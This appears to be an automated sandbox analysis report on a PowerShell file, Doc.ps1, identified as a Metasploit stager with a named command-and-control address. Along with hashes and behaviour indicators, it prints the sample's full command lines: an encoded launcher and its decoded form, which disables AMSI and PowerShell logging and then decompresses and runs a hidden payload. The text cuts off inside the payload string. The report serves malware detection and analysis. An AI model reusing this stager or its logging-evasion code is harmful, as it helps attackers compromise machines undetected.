metasploit | a0e25f0023b56e2ba4fdb12892fa55fa91f328b548b66a8f14d0e4e105957bf2

General

Target

Doc.ps1
Size

11KB
MD5

1b79c76903d0db77c6b8056afe67d8e3
SHA1

39baffb17f693bd08cac69c80c8766058bbc2236
SHA256

a0e25f0023b56e2ba4fdb12892fa55fa91f328b548b66a8f14d0e4e105957bf2
SHA512

8754f398c64af28ecf050391a5265b34be4c51f84446c2d8eb601622b77cefcf6ab9162974318083ea07235a1c2b3a575263a32fc46d5c1b181268fb41b3be12
SSDEEP

192:f20Cz1PRfs/FcQGGoYUPthzzP0dL1fyAZLlew8VxYvYLAF42xZaF9F6hdA:fw1QF2GoYUPthf0Pew8VxoDlxZjhdA

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

metasploit_stager

C2

87.98.149.2:9944

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 20 IoCs

flow	pid	Process
1	980	powershell.exe
1	980	powershell.exe
1	980	powershell.exe
1	980	powershell.exe
1	980	powershell.exe
1	980	powershell.exe
1	980	powershell.exe
1	980	powershell.exe
1	980	powershell.exe
1	980	powershell.exe
5	756	powershell.exe
5	756	powershell.exe
5	756	powershell.exe
5	756	powershell.exe
5	756	powershell.exe
5	756	powershell.exe
5	756	powershell.exe
5	756	powershell.exe
5	756	powershell.exe
5	756	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4220	powershell.exe
3544	powershell.exe
980	powershell.exe
3708	powershell.exe
756	powershell.exe
2880	powershell.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
4220	powershell.exe
4220	powershell.exe
4912	powershell.exe
4912	powershell.exe
3544	powershell.exe
3544	powershell.exe
980	powershell.exe
980	powershell.exe
2880	powershell.exe
2880	powershell.exe
3820	powershell.exe
3820	powershell.exe
3708	powershell.exe
3708	powershell.exe
756	powershell.exe
756	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	4912	powershell.exe
Token: SeDebugPrivilege	3544	powershell.exe
Token: SeDebugPrivilege	980	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	3820	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	756	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4220 wrote to memory of 4912	4220	powershell.exe	79
PID 4220 wrote to memory of 4912	4220	powershell.exe	79
PID 4912 wrote to memory of 4308	4912	powershell.exe	80
PID 4912 wrote to memory of 4308	4912	powershell.exe	80
PID 4308 wrote to memory of 3544	4308	cmd.exe	81
PID 4308 wrote to memory of 3544	4308	cmd.exe	81
PID 3544 wrote to memory of 980	3544	powershell.exe	82
PID 3544 wrote to memory of 980	3544	powershell.exe	82
PID 2880 wrote to memory of 3820	2880	powershell.exe	91
PID 2880 wrote to memory of 3820	2880	powershell.exe	91
PID 3820 wrote to memory of 4524	3820	powershell.exe	92
PID 3820 wrote to memory of 4524	3820	powershell.exe	92
PID 4524 wrote to memory of 3708	4524	cmd.exe	93
PID 4524 wrote to memory of 3708	4524	cmd.exe	93
PID 3708 wrote to memory of 756	3708	powershell.exe	94
PID 3708 wrote to memory of 756	3708	powershell.exe	94

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\Doc.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e YwBtAGQAIAAvAEMAIAAtAC0AJQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AbgBvAHAAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAG4AaQAgAC0AYwAgACIAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAgACQAegBuAFAAOAA9ACgAKAAnACcAUwBjAHIAJwAnACsAJwAnAGkAcAB0ACcAJwArACcAJwB7ADEAfQAnACcAKwAnACcAbABvAGMAawB7ADAAfQBvAGcAZwBpAHsAMgB9ACcAJwArACcAJwBnACcAJwApAC0AZgAnACcATAAnACcALAAnACcAQgAnACcALAAnACcAbgAnACcAKQA7AEkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADMAKQB7ACAAJABiAHQAZgBaAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACgAKAAnACcAewAxAH0AJwAnACsAJwAnAHsAJwAnACsAJwAnADYAfQAnACcAKwAnACcAcwB0AGUAJwAnACsAJwAnAG0AJwAnACsAJwAnAC4AewAnACcAKwAnACcAMAB9AHsAOQB9AG4AewA5AH0AJwAnACsAJwAnAHsANAB9ACcAJwArACcAJwBlAG0AZQBuACcAJwArACcAJwB0AC4AJwAnACsAJwAnAHsAOAB9AHsAMgB9AHQAewA3ACcAJwArACcAJwB9ACcAJwArACcAJwBtAHsAOQB9AHQAaQAnACcAKwAnACcAewA3AH0AbgAnACcAKwAnACcALgB7ADgAJwAnACsAJwAnAH0AJwAnACsAJwAnAG0AcwAnACcAKwAnACcAaQB7ADMAJwAnACsAJwAnAH0AdABpACcAJwArACcAJwB7ADUAJwAnACsAJwAnAH0AcwAnACcAKQAtAGYAJwAnAE0AJwAnACwAJwAnAFMAJwAnACwAJwAnAHUAJwAnACwAJwAnAFUAJwAnACwAJwAnAGcAJwAnACwAJwAnAGwAJwAnACwAJwAnAHkAJwAnACwAJwAnAG8AJwAnACwAJwAnAEEAJwAnACwAJwAnAGEAJwAnACkAKQA7ACAAaQBmACAAKAAkAGIAdABmAFoAKQAgAHsAIAAkAGIAdABmAFoALgBHAGUAdABGAGkAZQBsAGQAKAAoACgAJwAnACcAJwArACcAJwBhACcAJwArACcAJwBtAHsAJwAnACsAJwAnADQAfQBpAEkAewAwACcAJwArACcAJwB9ACcAJwArACcAJwBpAHsAMgB9AHsAJwAnACsAJwAnADEAJwAnACsAJwAnAH0AJwAnACsAJwAnAGEAaQBsAHsAMwB9AGQAJwAnACkALQBmACcAJwBuACcAJwAsACcAJwBGACcAJwAsACcAJwB0ACcAJwAsACcAJwBlACcAJwAsACcAJwBzACcAJwApACwAJwAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwAnACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7ACAAfQA7ACAAJAB6AFcAPQAoACgAJwAnAHsAMQB9AG4AJwAnACsAJwAnAGEAYgBsAGUAewA0AH0AYwB7ADUAfQBpAHsAMAB9AHQAJwAnACsAJwAnAHsAMgB9ACcAJwArACcAJwBsAG8AYwBrAEkAbgAnACcAKwAnACcAewAzAH0AbwBjAGEAdAAnACcAKwAnACcAaQBvAG4ATABvAGcAZwAnACcAKwAnACcAaQBuAGcAJwAnACsAJwAnACcAJwApAC0AZgAnACcAcAAnACcALAAnACcARQAnACcALAAnACcAQgAnACcALAAnACcAdgAnACcALAAnACcAUwAnACcALAAnACcAcgAnACcAKQA7ACAAJAByADgARAA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAoACgAJwAnACcAJwArACcAJwB7ADIAfQB7ADQAfQBzAHQAZQBtAC4AewAzAH0AJwAnACsAJwAnAGEAbgBhAGcAJwAnACsAJwAnAGUAJwAnACsAJwAnAG0AZQBuACcAJwArACcAJwB0AC4AQQB7ADUAfQB0AG8AJwAnACsAJwAnAG0AYQB0AGkAbwBuAC4AewAwAH0AdABpAHsAJwAnACsAJwAnADEAfQBzACcAJwApAC0AZgAnACcAVQAnACcALAAnACcAbAAnACcALAAnACcAUwAnACcALAAnACcATQAnACcALAAnACcAeQAnACcALAAnACcAdQAnACcAKQApADsAIAAkAHEATwBLAD0AJAByADgARAAuAEcAZQB0AEYAaQBlAGwAZAAoACcAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcAJwAsACcAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAJwApADsAIABJAGYAIAAoACQAcQBPAEsAKQAgAHsAIAAkAGsATQBaAD0AJABxAE8ASwAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApADsAIAAkAHkASQB6AGMAbAA9AFsAQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwAuAEQAaQBjAHQAaQBvAG4AYQByAHkAWwBzAHQAcgBpAG4AZwAsAFMAeQBzAHQAZQBtAC4ATwBiAGoAZQBjAHQAXQBdADoAOgBuAGUAdwAoACkAOwAgACQAdAA4AFoAWAA3AD0AKAAoACcAJwBFAG4AJwAnACsAJwAnAGEAewAzAH0AbABlACcAJwArACcAJwB7ADEAJwAnACsAJwAnAH0AYwByAGkAcAB0AEIAJwAnACsAJwAnAGwAbwBjAHsAJwAnACsAJwAnADIAfQB7ADAAfQBvAGcAZwBpAG4AZwAnACcAKQAtAGYAJwAnAEwAJwAnACwAJwAnAFMAJwAnACwAJwAnAGsAJwAnACwAJwAnAGIAJwAnACkAOwAgAEkAZgAoACQAawBNAFoAWwAkAHoAbgBQADgAXQApAHsAIAAkAGsATQBaAFsAJAB6AG4AUAA4AF0AWwAkAHoAVwBdAD0AMAA7ACAAJABrAE0AWgBbACQAegBuAFAAOABdAFsAJAB0ADgAWgBYADcAXQA9ADAAOwAgAH0AIAAkAHkASQB6AGMAbAAuAEEAZABkACgAJAB6AFcALAAwACkAOwAgACQAeQBJAHoAYwBsAC4AQQBkAGQAKAAkAHQAOABaAFgANwAsADAAKQA7ACAAJABrAE0AWgBbACcAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAAnACcAKwAkAHoAbgBQADgAXQA9ACQAeQBJAHoAYwBsADsAIAB9ACAARQBsAHMAZQAgAHsAIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAoACcAJwBTAHkAJwAnACsAJwAnAHMAJwAnACsAJwAnAHQAZQBtAC4AewA1AH0AJwAnACsAJwAnAGEAbgAnACcAKwAnACcAYQB7ADQAfQBlAG0AZQBuAHQALgBBAHsAMwB9ACcAJwArACcAJwB0AG8AbQBhAHQAaQBvACcAJwArACcAJwBuAC4AUwBjAHIAaQBwAHQAewAxAH0AewAwAH0AJwAnACsAJwAnAG8AYwB7ACcAJwArACcAJwAyAH0AJwAnACkALQBmACcAJwBsACcAJwAsACcAJwBCACcAJwAsACcAJwBrACcAJwAsACcAJwB1ACcAJwAsACcAJwBnACcAJwAsACcAJwBNACcAJwApACkALgBHAGUAdABGAGkAZQBsAGQAKAAnACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACcALAAnACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMALgBIAGEAcwBoAFMAZQB0AFsAcwB0AHIAaQBuAGcAXQApACkAOwAgAH0AfQA7ACYAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBjAHIAZQBhAHQAZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACwAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAKAAnACcASAA0AHMASQBBAE8AcAAyAGIAVwBjAEMAQQA3AFYAVwBiAFcALwBhAFMAJwAnACsAJwAnAEIARAArAFgAcQBuAC8AdwBhAHEAUQBNAEEAbwBCAFEAMgAnACcAKwAnACcAaQBiAFIAcQBwADAAdABqAEgAQgBMAGkAUwA0AEQAdQBhAHQANgBMAFQAWQBpADcAMQBsAHYAUwBiADIARQBpAEMAOQAvAHYAZQBiAE4AWABaAEkAbABPAFMAdQBkADEATAAzAGkANwAyADcATQA3AE8AegB6AHoAdwB6AHMAOABzAE4AOAB6AGkASgBtAGUAUQBiADAAbwArADMAYgA2AFIAOABEAEYAQwBDAEkAawBrAHUANwBaADMAcgBxAGwAUQBLAHcAOABwAHgAcQAzAFMAcgBSACcAJwArACcAJwB0AEoAbgAnACcAKwAnACcAUwBaADYAcAA2ADMAVQA3AGoAaABCAGgAOAA0AHMATAB7ADEAfQBaAE0AawBtAFAASABEAHYASABhAEoAdQBaAHEAbQBPAEYAcABRAGcAbABPADUASQB2ADAAbABqAFUASwBjADQATgBQAHIAeABYAHsAMQB9AHMAYwBlAG0ASABWAFAAcQB6AGQAawBuAGoAQgBhAEsANQAyAEYANQBIAFgAbwBpAGwAVQA1AFgANQBZAHEAOABYAGUAMABnADQAVgBYAFAAVwBsAEgAQwA1AC8ATwAxAGIAdQBUAEkANwBiAGMAeAByAHgAdQAwAEcAMABWAFEAdQBPAC8AdQBVADQANgBqAG0AVQAxAHEAdQBTAEQAOAByADQAcwBDAGIALwBSAHIATAA1AFQANwB4AGsAagBpAE4AbAA3AHcAMgBJAHUAeQBzAFcAUgB1AHkARgBDADMAeABGAFYAaQA3AHcAMwAzAE0AdwA5AGgAUAB5ADMAQwBYADQAMgAwAFMAegBEAGMASgB5AHkANABsAHIAQgB4AGsANQBEAEwAOABEAHAAJwAnACsAJwAnAEwAWQBVADMAMAAvAHcAVwBsAGEAcgBrAG8AegBZAFgAOAAyAG4ALwA4AGgAegAvAEwARAB2ADIANABZAEoAeABHAHUAbQBZAHoAagBKAEYANAA3AE8ATABrAGoASABrADUAcgBYAGMAUgA4AGkAcgAvAGkANQBSAHkAMABIAEoANABRAEYAcwB3AHIARgBSAEMANwBpADEAZABZAEwAcgBFAE4AcABWAFgAcAB2ADUAaQBSAHIALwBDADIAZwBPADUAWABsAGUAVABIAFMAaQBBADEANABFAG0AbABDAHYARgA4AHsAMQB9AHMAMQArADcARwA4AG8AUABpAGkAVwBYAC8AQgBUAFUASwBBAEMANAAwAEEARAB3AE8ANgBuAGcARwA5AFoAMABDAFkANQAnACcAKwAnACcAUQA4ADQATAB4AEQAawB1AEYARwBPAFcANwBXAEQAdwBWAHgANwBFAEsAYwBtAFUAUAAwAHQASwBWAGUAcgBEADAAWQBqAEgAeQBSADYAbQBwAFoAdABrAGcAeQB2AHoAQgA3AFMAbABVAG4ASgBkAC8AVgBWAGIAagBVAEkAUgAxAEwAYgBKADcAUwBkAFkAbQByAGsAeAA4AGUAZABIAEEAMAA5AEMAWAB3AHAAdABJAHsAMQB9AEkANgBqAGQAdAA0AFMAUgBoAHUANwB4AG0ASwBpAEYAYwB3AFYAWAA0AHAASABIAGgASgBjAFkAWgBIAHIAUgBDADcAQQB2AC8AawBjAHIANgBCACcAJwArACcAJwAvAFQAYQBtAE8ARQBCAGMASQBDAHgAWQA4AFUAegBOAGkAQQBoAC8AMABOAFUAMgBoAFAAbwA0AFUAVAAwAEkAYQBRAHAAZQBRAGIAUQByAFQANQAwADUAQgBFADAAdQBtADYAeQBQAEkANABEAHUATQBBAGUAYQBsAHAAYQBRAEgANwBpAFEAegBuAE4AaQBYADUAdwB1ADUAaQBCAFUAMQBpAGwASwAwADYAbwAwADIARQBDAEMAZQBsAFgASgB3AFkAaABpAHYAeQBxAHAATABDAFgANQBsAHIAcgBoAGMAewAxAH0AWgBiAFAAcgByAGIAMwAxAEIATwBQAEoAVAB5AHcAdAB5ADgAOABnAFQATQAvAEYAQQA5AFoAaQBsAFAATgBoADYARQBGAEEAQwA0AGMAZABiAFkASQA0AGcASwBQAEsAcAAnACcAKwAnACcAUwBsAC8AaABZADIAegBzAGsASwBBADQAdgB2ADQAaQBHAGoAaQBpAEYAdABBAEYATABkAHgAQQBOAFcAQgBFAG8ATwBGAHcAUQBKAFEARQAvAGcAUgBTAFYAbQBvAE8ANQBHAGEAMABwAGoAawBBAGkASwB4AFkAZABpAGcASQBvAEQAWABsAHEAWgBMAHgAQwAnACcAKwAnACcAQQB7ADEAfQBiAEwATAB6AHAAWgAnACcAKwAnACcASgBNAEMAQgA3AFEASwBUAEEAbwB4ACcAJwArACcAJwBIAEwAawBLAGcASABSAHIAegBxAHUAUwBTAGgARQBQAGgARQB7ADEAfQBnAEsAWQB2ADAAUABEADUANABYAEgASABCAEYAVAAzAEEAZQBGAEwAbgBJAHEANQBtADIANQA0AEwANABwAGEAMABuAHUASgBsAEQAawB3AEcAUgBjAEEAQwBoAGsAOABTAFIAaABsAEwAOABvAFgAVwBvAEwAUABLADcAdQBrAEgAYQA3AHcAewAxAH0AdAArAEYANgBGAFkAWABTACsAMgBxADcAbQBEAE4AMgBwADIAewAxAH0AYwB0ADYAcAAnACcAKwAnACcAagBjAG0AUgBpAGsATgB3AHgARABrAHoAVABNAHcARgBGAFAAegBwAHoAVgArAHEAcgB2AFUAWgBPAGMAVwBiAGIAVAA3AHEAcABKAGUAeABjAHUAVgBUAE0AMQBqAGEANgAyAHQAeAB1AGEANgBuAFgASgBSADkAewAxAH0AUwBoAGsAUABRAEkAMwByAFAALwByADQAegBWAFYAKwBMAGcAbgBFAHcAMABiAHsAMQB9AG0ASQBCAHkAYgBjAEoARABlACcAJwArACcAJwBDADgAdwBBAHYAcABvAFoAZQBwAG8AeQBWAFEASgBOAE0AYgBsADUAYQBUAGcAOQBXADkAYwBzAGsATABkAGIAagBXAGwAMgBUAHYAMgBjAGEAdQBUAGUATQBSADIAMQBPAHgATABuADIAVgAnACcAKwAnACcANwBYAGEAcQBNAGQAbgBHAE8AMABXAHQAMwB4ADcAawBhADkANgBsAHQAcQAyAEwAbgAyAE8ANAAxAG0ASgB6AFMASQBvAHEANABjAHUAMgB0AFAAVgA1AGUAOQB0AHAASABOAFAAVABHADMASgA2AGwAQgBqAE0ANABFADcATgBpADIARwArAEsAUgB1ADkAWgBHAFIAbQBkAHEAdQAyAHMAegBPAE4AawBHAHQAdAB1AHIAdAB6AHEAaABCAHUAcwBtADIAewAxAH0AWABXAFQAaAAxAEcAbwAyAEgAZABNAHsAMQB9ACsAKwBUADgALwB2ACsAKwBDAHUANwBVADQAdABnAHEAZABtAGcAUABlAEIAYQBxAHUAcQBNADIASABVAFcAVwB4ADEAVgBWADkATQAzAE8AWQBYAFYAMQAxADEAaAByAEMAMgB1AGoASABaAHoAbAA2AHMAKwAvADUAKwAwAHEAMQAvAGMAdgBzAEUAcgAyAFAAVgBOAGwAUwAxAFEAeQBFADMASQB4AFYAdAAyAC8AWABHAEsAUAA1AGkAdQArAC8AdABvAGEASABzADkAawBOAGwAdAB6AFcAKwAxADcAYwBHAHMAYgBhAHIALwBEAHUAOAAvAFAAQQBoAHEAQwA5AGIAZwA3AHIAcgBtAEsAeQBMAFEAZwAzADgAMwBWAHUAdABGAGIARgBPAFkAQwA5AEMAcgBqAEoAWgAxAGwAMgBCAFgAOQB0AGcAOQBYAHMAMgBwAG0AaQBnAE4AMgBLADYAcQBEAGUARwBwAFAAMQBSADAAMAB5AEMATABZAEgAaAByAFMAYgB1AGIAYgBMADMAOQBpAEwAVwBtADEANgA0ACcAJwArACcAJwBCAEoALwBNADQATgB3AE8AeABqAEYAcgBvAGgAWABZAEgAUQBVAHEAZQBBAHsAMQB9ADMAZwB6AGcAdgBMAFIATgAwAHQAQQAwACcAJwArACcAJwBsAHEAKwAnACcAKwAnACcASABKAFcATgBpAHkAdABrAHAAawAnACcAKwAnACcANwBSAFQAaABaADIAUwBkAGcAMgAvAE4AMwBBAGUAVgBNADMATgBjAEIALwAvAFUAYgB0AHYAUgAyAGEAVgBqAGoAcABzACsANwBtAGoAMQBFACsALwB6AE8ANgBEAGsAYgBFAGcAWQBQADIAdgBPAFMAKwBoAFAAVQBhAHYAewAxAH0AdgBpAG0ARgA1ADgAMQBIAHYASAB5AHQARAB7ADEAfQBWAFIAawBvAGEASQBBAGwAKwBoAHcAUgBUAFYAbwBoAE0AbgBuAGIAeAByAEQARwBJAGkATgBHAFEAWgBIAGgAMAByAG4ARABCAE0AbwBWAFYARABNAHkAOABTAFQAYQBVADAAOQBrAFMALwB5AHIAbwBMADkATQBwAEQAQgB4AE0ATgBkAFcAaABtAEgAcgAzADAAVgA1AEUAZQBCAEMAdgBIAFIAbABZAHMAWABWAHgATQB3AFUAZQBSAHcAVgA2AHQAaAAxAG4AQQB3ADYAcQB5AE8AMQBNAFUANgBFAEQASwBUAG0AbABsAE8AewAxAH0AcgByADkAOQBMAGoAOQBWADQARwBVADEAWABSAHcAUQBRAHEAQgA4AE0AMABNAHcAeQAyAHkARgBLAFMANQBkADgATgBFADcAeABRAE8ARgBUAE0AMQA0AEYANgBEAFQATQA0AGUAUQBWAEYARABpAHIAdQBvAHsAMQB9AGcASQA1AEwAUQA0AHAAbwA5AHgATwAxAHoAcQBnAFEARgBIADEAQQBDAHUAQgBsAHgANgBKAHAANABtAFEAQQB4AFEAUABzAFcAMwBVAG8AbQBMAHoAdgAzADQASgBWAEIASwB4ADcAKwBUAEsAbgBuAHgARABPAEgAagAvAHgAdABWAGoAbQB2AC8AcwBQAHQATAA5AEYARwBxAEcAUwA3AFAAVgBwADgAdQBQAEcAbwA1AHYAKwAzACsASQAwAFEANAB5AEQAbgBRAEIAQwBnACsAUABFACcAJwArACcAJwBkAGUAaABpAEYAUABqAGsAZQBSAFQAYwBkAEEALwBXAFUAKwAnACcAKwAnACcAeABPAHYAOABlAHMATgBQAHIAKwBDADkAbAB6AFcAaAB2AHcARQBGADUANABuAC8ARQBnAHcAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBmACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsAIgA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $znP8=((''Scr''+''ipt''+''{1}''+''lock{0}oggi{2}''+''g'')-f''L'',''B'',''n'');If($PSVersionTable.PSVersion.Major -ge 3){ $btfZ=[Ref].Assembly.GetType(((''{1}''+''{''+''6}''+''ste''+''m''+''.{''+''0}{9}n{9}''+''{4}''+''emen''+''t.''+''{8}{2}t{7''+''}''+''m{9}ti''+''{7}n''+''.{8''+''}''+''ms''+''i{3''+''}ti''+''{5''+''}s'')-f''M'',''S'',''u'',''U'',''g'',''l'',''y'',''o'',''A'',''a'')); if ($btfZ) { $btfZ.GetField(((''''+''a''+''m{''+''4}iI{0''+''}''+''i{2}{''+''1''+''}''+''ail{3}d'')-f''n'',''F'',''t'',''e'',''s''),''NonPublic,Static'').SetValue($null,$true); }; $zW=((''{1}n''+''able{4}c{5}i{0}t''+''{2}''+''lockIn''+''{3}ocat''+''ionLogg''+''ing''+'''')-f''p'',''E'',''B'',''v'',''S'',''r''); $r8D=[Ref].Assembly.GetType(((''''+''{2}{4}stem.{3}''+''anag''+''e''+''men''+''t.A{5}to''+''mation.{0}ti{''+''1}s'')-f''U'',''l'',''S'',''M'',''y'',''u'')); $qOK=$r8D.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qOK) { $kMZ=$qOK.GetValue($null); $yIzcl=[Collections.Generic.Dictionary[string,System.Object]]::new(); $t8ZX7=((''En''+''a{3}le''+''{1''+''}criptB''+''loc{''+''2}{0}ogging'')-f''L'',''S'',''k'',''b''); If($kMZ[$znP8]){ $kMZ[$znP8][$zW]=0; $kMZ[$znP8][$t8ZX7]=0; } $yIzcl.Add($zW,0); $yIzcl.Add($t8ZX7,0); $kMZ[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$znP8]=$yIzcl; } Else { [Ref].Assembly.GetType(((''Sy''+''s''+''tem.{5}''+''an''+''a{4}ement.A{3}''+''tomatio''+''n.Script{1}{0}''+''oc{''+''2}'')-f''l'',''B'',''k'',''u'',''g'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOp2bWcCA7VWbW/aS''+''BD+Xqn/waqQMAoBQ2''+''ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR''+''tJn''+''SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp''+''LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5''+''Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B''+''/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4